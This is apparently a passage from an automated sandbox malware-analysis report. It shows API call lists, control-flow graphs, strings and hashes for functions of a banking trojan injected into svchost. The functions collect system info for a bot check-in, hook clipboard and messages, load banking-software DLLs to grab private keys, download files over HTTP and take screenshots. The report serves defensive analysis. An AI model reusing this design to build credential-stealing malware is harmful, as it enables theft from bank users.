                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,true,02C73EFD,?,00000000), ref: 02C74F95
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74FA7
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,02C73EFD,00000000,00000000), ref: 02C74FCD
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C74FDE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Write$System$User$AdminFormatHandleInformationMetricsNameTime_snprintf$CapsCloseCreateDateDefaultDeviceDirectoryEnvironmentLangModuleVariableWindowsZonememset
                                                                                                                                                                                                                    • String ID: %c%d:%02d$%dx%d@%d$4.0.1$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                                    • API String ID: 113499719-3279427369
                                                                                                                                                                                                                    • Opcode ID: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                                    • Instruction ID: b2fa6146e9022246d4178943fe94a64be024fc2ff43f79197264d154892d7f77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D226DB1D40218FEEB16DFA4CC89EEEBB7DEF45700F10459AB246A7141E6B45B48CB60
                                                                                                                                                                                                                    Function 02C844F0 Relevance: 110.5, APIs: 42, Strings: 21, Instructions: 296libraryloaderthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 249 2c844f0-2c84573 memset GetModuleFileNameA AddVectoredExceptionHandler CreateMutexA CreateThread 250 2c84598-2c845c3 InitializeCriticalSection call 2c81330 LoadLibraryExA 249->250 251 2c84575-2c84589 GetHandleInformation 249->251 256 2c845e1-2c845f0 LoadLibraryExA 250->256 257 2c845c5-2c845cf GetProcAddress 250->257 251->250 253 2c8458b-2c8458f 251->253 253->250 254 2c84591-2c84592 CloseHandle 253->254 254->250 259 2c845f2-2c845fc GetProcAddress 256->259 260 2c84646-2c8465a InitializeCriticalSection GetModuleHandleA 256->260 257->256 258 2c845d1-2c845dc call 2c88fc0 257->258 258->256 259->260 264 2c845fe-2c84618 call 2c88fc0 GetProcAddress 259->264 261 2c84678-2c84691 GetCurrentProcessId call 2c92e00 260->261 262 2c8465c-2c84666 GetProcAddress 260->262 271 2c846d2-2c846e3 LoadLibraryExA 261->271 272 2c84693-2c846b3 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 261->272 262->261 265 2c84668-2c84673 call 2c88fc0 262->265 264->260 273 2c8461a-2c84634 call 2c88fc0 GetProcAddress 264->273 265->261 276 2c84701-2c84707 GetCurrentProcessId call 2c92e00 271->276 277 2c846e5-2c846ef GetProcAddress 271->277 272->271 274 2c846b5-2c846c9 lstrcmpiA 272->274 273->260 285 2c84636-2c84641 call 2c88fc0 273->285 274->271 279 2c846cb-2c846d0 call 2c775b0 274->279 283 2c8470c-2c8470e 276->283 277->276 281 2c846f1-2c846fc call 2c88fc0 277->281 279->276 281->276 287 2c8474c-2c84750 283->287 288 2c84710-2c84730 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 283->288 285->260 291 2c848a3-2c848a9 287->291 292 2c84756-2c84776 call 2c882e0 call 2c71670 StrStrIA 287->292 288->287 290 2c84732-2c84746 lstrcmpiA 288->290 290->287 290->291 297 2c84778-2c84788 StrStrIA 292->297 298 2c8478e-2c847a3 LoadLibraryExA 292->298 297->291 297->298 299 2c847f9-2c8482f InitializeCriticalSection call 2c80820 call 2c800b0 call 2c7eeb0 LoadLibraryExA 298->299 300 2c847a5-2c847af GetProcAddress 298->300 315 2c8484d-2c8485a LoadLibraryExA 299->315 316 2c84831-2c8483b GetProcAddress 299->316 302 2c847c1-2c847cb GetProcAddress 300->302 303 2c847b1-2c847bc call 2c88fc0 300->303 305 2c847dd-2c847e7 GetProcAddress 302->305 306 2c847cd-2c847d8 call 2c88fc0 302->306 303->302 305->299 309 2c847e9-2c847f4 call 2c88fc0 305->309 306->305 309->299 317 2c84878-2c84885 LoadLibraryExA 315->317 318 2c8485c-2c84866 GetProcAddress 315->318 316->315 319 2c8483d-2c84848 call 2c88fc0 316->319 317->291 322 2c84887-2c84891 GetProcAddress 317->322 318->317 321 2c84868-2c84873 call 2c88fc0 318->321 319->315 321->317 322->291 324 2c84893-2c8489e call 2c88fc0 322->324 324->291
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F550,75AF7390,76230A60), ref: 02C84527
                                                                                                                                                                                                                    • AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD858), ref: 02C8464B
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02C84652
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02C84662
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,02C76A30,02CC7BA8), ref: 02C84678
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C84693
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C846A8
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C846AF
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C846C1
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C846DB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02C846EB
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,02C7ABD0,02CBCC94), ref: 02C84701
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C84710
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C84725
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C8472C
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C8473E
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,java), ref: 02C84772
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C84784
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C8479D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02C847AB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02C847C7
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02C847E3
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD840), ref: 02C847FE
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02C8482B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02C84837
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02C84856
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02C84862
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02C84881
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02C8488D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                                    • String ID: .exe$80f507eba$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                                    • API String ID: 1248150503-1245504843
                                                                                                                                                                                                                    • Opcode ID: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                                    • Instruction ID: 30f4eea14a0cac2fd906ffe96af7effc306e659fab77b5ce78b910cc3d23f5b5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9591A071BC035676FA2677B09C4AF9A676D9F80F49F1186A0F502F3080DBA5E6018A79
                                                                                                                                                                                                                    Function 02C839C0 Relevance: 72.1, APIs: 33, Strings: 8, Instructions: 323memorynetworkfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 372 2c839c0-2c83a05 memset 373 2c83a0b-2c83a0e 372->373 374 2c83d4d-2c83d4f 372->374 373->374 375 2c83a14-2c83a17 373->375 376 2c83d7f-2c83d87 374->376 377 2c83d51-2c83d71 call 2c83620 374->377 378 2c83a19-2c83a1b 375->378 379 2c83a71-2c83a8b InternetOpenA 375->379 383 2c83d76-2c83d7c 377->383 381 2c83a21-2c83a2f 378->381 379->374 382 2c83a91-2c83aac InternetConnectA 379->382 381->381 384 2c83a31-2c83a33 381->384 385 2c83ab2-2c83abb 382->385 386 2c83d43-2c83d4a InternetCloseHandle 382->386 387 2c83a40-2c83a51 384->387 388 2c83abd 385->388 389 2c83ac2-2c83ae2 HttpOpenRequestA 385->389 386->374 390 2c83a53 387->390 391 2c83a55-2c83a5c 387->391 388->389 392 2c83ae8-2c83af6 389->392 393 2c83d39-2c83d40 InternetCloseHandle 389->393 390->391 391->387 394 2c83a5e-2c83a6c call 2c86c40 391->394 395 2c83af8-2c83afc 392->395 396 2c83b0d-2c83b20 HttpAddRequestHeadersA 392->396 393->386 394->379 395->396 400 2c83afe-2c83b0b HttpAddRequestHeadersA 395->400 397 2c83b52-2c83b67 HttpSendRequestA 396->397 398 2c83b22-2c83b50 _snprintf HttpAddRequestHeadersA 396->398 401 2c83d2c-2c83d36 InternetCloseHandle 397->401 402 2c83b6d-2c83b87 HttpQueryInfoA 397->402 398->397 400->396 401->393 402->401 403 2c83b8d-2c83b94 402->403 403->401 404 2c83b9a-2c83bbe CreateFileA 403->404 404->401 405 2c83bc4-2c83bca 404->405 406 2c83bd0-2c83be4 GetProcessHeap RtlAllocateHeap 405->406 407 2c83bea-2c83c17 memset InternetReadFile 406->407 408 2c83c73-2c83c75 406->408 411 2c83c19-2c83c1e 407->411 412 2c83c57-2c83c65 GetProcessHeap HeapValidate 407->412 409 2c83c9a-2c83cac call 2c76570 408->409 410 2c83c77-2c83c8b GetHandleInformation 408->410 420 2c83d29 409->420 421 2c83cb2-2c83cbc 409->421 410->409 414 2c83c8d-2c83c91 410->414 411->412 416 2c83c20-2c83c44 WriteFile GetProcessHeap HeapValidate 411->416 412->408 413 2c83c67-2c83c6d GetProcessHeap HeapFree 412->413 413->408 414->409 417 2c83c93-2c83c94 CloseHandle 414->417 416->406 419 2c83c46-2c83c52 GetProcessHeap HeapFree 416->419 417->409 419->406 420->401 422 2c83cc0-2c83cce 421->422 422->422 423 2c83cd0 422->423 424 2c83cd2-2c83ce3 423->424 425 2c83ce5 424->425 426 2c83ce7-2c83cee 424->426 425->426 426->424 427 2c83cf0-2c83d08 call 2c86c40 call 2c764d0 426->427 431 2c83d0d-2c83d1b GetProcessHeap HeapValidate 427->431 431->420 432 2c83d1d-2c83d23 GetProcessHeap HeapFree 431->432 432->420
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                                    • GET, xrefs: 02C83AB6
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83B22
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocateCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                                    • API String ID: 2233330183-4291293516
                                                                                                                                                                                                                    • Opcode ID: 2699ca759f0f75da8cde7b86268e7c4c50e21c9675503aa4004739548e5a31b0
                                                                                                                                                                                                                    • Instruction ID: e9e0518cfa772f2fcc0f91f2f8754f9ff787320be5ffe8050f190806518866ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2699ca759f0f75da8cde7b86268e7c4c50e21c9675503aa4004739548e5a31b0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6B1FC71A402946BDB11EF64DC89FEF7B78EF48F18F104598FA05A7180D770AA44CBA4
                                                                                                                                                                                                                    Function 02C73940 Relevance: 65.3, APIs: 24, Strings: 13, Instructions: 538threadmemorynativeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 491 2c73940-2c7395f 492 2c73965-2c7396a 491->492 493 2c73fd8-2c73fe3 491->493 492->493 494 2c73970-2c73975 492->494 494->493 495 2c7397b-2c73980 494->495 495->493 496 2c73986-2c7398b 495->496 496->493 497 2c73991-2c739b5 496->497 497->493 498 2c739bb 497->498 499 2c739c1-2c739c4 498->499 500 2c73a6e-2c73a72 499->500 501 2c739ca-2c739f3 VirtualQuery 499->501 500->493 504 2c73a78-2c73a85 call 2c73750 500->504 502 2c739f5-2c73a51 VirtualQuery * 2 501->502 503 2c73a5a-2c73a68 501->503 502->503 505 2c73a53 502->505 503->499 503->500 504->493 508 2c73a8b-2c73aac call 2c737c0 VirtualAlloc 504->508 505->503 508->493 511 2c73ab2-2c73ad2 SymSetOptions GetCurrentProcess SymInitialize 508->511 512 2c73ad4-2c73b09 GetCurrentProcess call 2c73830 511->512 513 2c73b0e-2c73b10 511->513 512->513 515 2c73b13-2c73b18 513->515 515->515 516 2c73b1a-2c73b21 515->516 517 2c73b24-2c73b29 516->517 517->517 518 2c73b2b-2c73bc5 call 2c93910 * 2 GetLastError _snprintf call 2c93910 517->518 525 2c73bc7-2c73be3 call 2c93910 * 2 518->525 526 2c73c2f 518->526 525->526 541 2c73be5-2c73beb 525->541 527 2c73c32-2c73c36 526->527 529 2c73c95-2c73cb2 527->529 530 2c73c38-2c73c53 GetCurrentThread ZwQueryInformationThread 527->530 533 2c73cb5-2c73cbb 529->533 530->529 532 2c73c55 530->532 535 2c73c58-2c73c5e 532->535 533->533 536 2c73cbd-2c73ce5 533->536 535->535 538 2c73c60-2c73c90 GetCurrentProcess call 2c73830 535->538 539 2c73ce7-2c73cea 536->539 540 2c73d13-2c73d15 536->540 538->529 539->540 544 2c73cec-2c73cf0 539->544 542 2c73d18-2c73d1d 540->542 545 2c73bf0-2c73bf6 541->545 542->542 546 2c73d1f-2c73d21 542->546 547 2c73cf2-2c73cf6 544->547 548 2c73d0a-2c73d11 544->548 545->545 549 2c73bf8-2c73c2d 545->549 550 2c73fc7-2c73fd2 VirtualFree 546->550 551 2c73d27-2c73d29 546->551 547->548 552 2c73cf8-2c73d02 GetCurrentProcess call 2c73830 547->552 548->539 548->540 549->527 550->493 553 2c73d30-2c73d40 551->553 556 2c73d07 552->556 553->553 555 2c73d42-2c73d54 PathAddBackslashA 553->555 557 2c73d56-2c73d5b 555->557 556->548 557->557 558 2c73d5d-2c73d67 557->558 559 2c73d68-2c73d6e 558->559 559->559 560 2c73d70-2c73d9c PathAddBackslashA call 2c73090 call 2c769d0 559->560 565 2c73da0-2c73db0 560->565 565->565 566 2c73db2-2c73dbe PathAddBackslashA 565->566 567 2c73dc0-2c73dc5 566->567 567->567 568 2c73dc7-2c73dcf 567->568 569 2c73dd0-2c73dd6 568->569 569->569 570 2c73dd8-2c73e54 GetDateFormatA GetTimeFormatA _snprintf 569->570 571 2c73e56-2c73e5b 570->571 571->571 572 2c73e5d-2c73e67 571->572 573 2c73e68-2c73e6e 572->573 573->573 574 2c73e70-2c73e7e 573->574 575 2c73e80-2c73e90 574->575 575->575 576 2c73e92-2c73e9e PathAddBackslashA 575->576 577 2c73ea0-2c73ea5 576->577 577->577 578 2c73ea7-2c73eb1 577->578 579 2c73eb2-2c73eb8 578->579 579->579 580 2c73eba-2c73ecf 579->580 581 2c73ed0-2c73ed6 580->581 581->581 582 2c73ed8-2c73eff call 2c74920 581->582 585 2c73f00-2c73f10 582->585 585->585 586 2c73f12-2c73f1e PathAddBackslashA 585->586 587 2c73f20-2c73f25 586->587 587->587 588 2c73f27-2c73f31 587->588 589 2c73f32-2c73f38 588->589 589->589 590 2c73f3a-2c73f4f 589->590 591 2c73f50-2c73f56 590->591 591->591 592 2c73f58-2c73f70 call 2c93950 591->592 594 2c73f75-2c73f85 call 2c764b0 592->594 594->550 597 2c73f87-2c73f8f 594->597 598 2c73f90-2c73f95 597->598 598->598 599 2c73f97-2c73fc2 call 2c766a0 call 2c93e00 PathAddBackslashA call 2c825c0 call 2c76a10 598->599 599->550
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C739EC
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A17
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A3E
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02C73A9F
                                                                                                                                                                                                                    • SymSetOptions.DBGHELP(00000006), ref: 02C73AB4
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02C73AC4
                                                                                                                                                                                                                    • SymInitialize.DBGHELP(00000000), ref: 02C73AC7
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C73B05
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02C73B90
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73BAE
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C73C44
                                                                                                                                                                                                                    • ZwQueryInformationThread.NTDLL(00000000), ref: 02C73C4B
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 02C73C88
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • ExceptionAddress = , xrefs: 02C73AD4
                                                                                                                                                                                                                    • scr.bmp, xrefs: 02C73F58
                                                                                                                                                                                                                    • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02C73BA7
                                                                                                                                                                                                                    • DEBUG, xrefs: 02C73FAD
                                                                                                                                                                                                                    • csm, xrefs: 02C73965
                                                                                                                                                                                                                    • main, xrefs: 02C73B57
                                                                                                                                                                                                                    • Self exception = TRUE, xrefs: 02C73BF8
                                                                                                                                                                                                                    • CallStack:, xrefs: 02C73CBD
                                                                                                                                                                                                                    • HH;mm;ss, xrefs: 02C73E12
                                                                                                                                                                                                                    • sysinfo.log, xrefs: 02C73ED8
                                                                                                                                                                                                                    • debug_%s_%s.log, xrefs: 02C73E34
                                                                                                                                                                                                                    • dd;MMM;yyyy, xrefs: 02C73DED
                                                                                                                                                                                                                    • ThreadStart = , xrefs: 02C73C60
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentQueryVirtual$Process$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                                    • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                                    • API String ID: 3375037927-1369666974
                                                                                                                                                                                                                    • Opcode ID: f59701b2f699932ed3d84dda879ddc91e43f7ad522b8dade66d9497286ee14aa
                                                                                                                                                                                                                    • Instruction ID: 506229e922478522f59c4e797cef5f4b2d10b56b102a1ea82a7b136c19998999
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f59701b2f699932ed3d84dda879ddc91e43f7ad522b8dade66d9497286ee14aa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6622C470E406859FDB15CF68C894BAABBF5FF89300F2486D9E949EB340D731AA45CB50
                                                                                                                                                                                                                    Function 00402C10 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
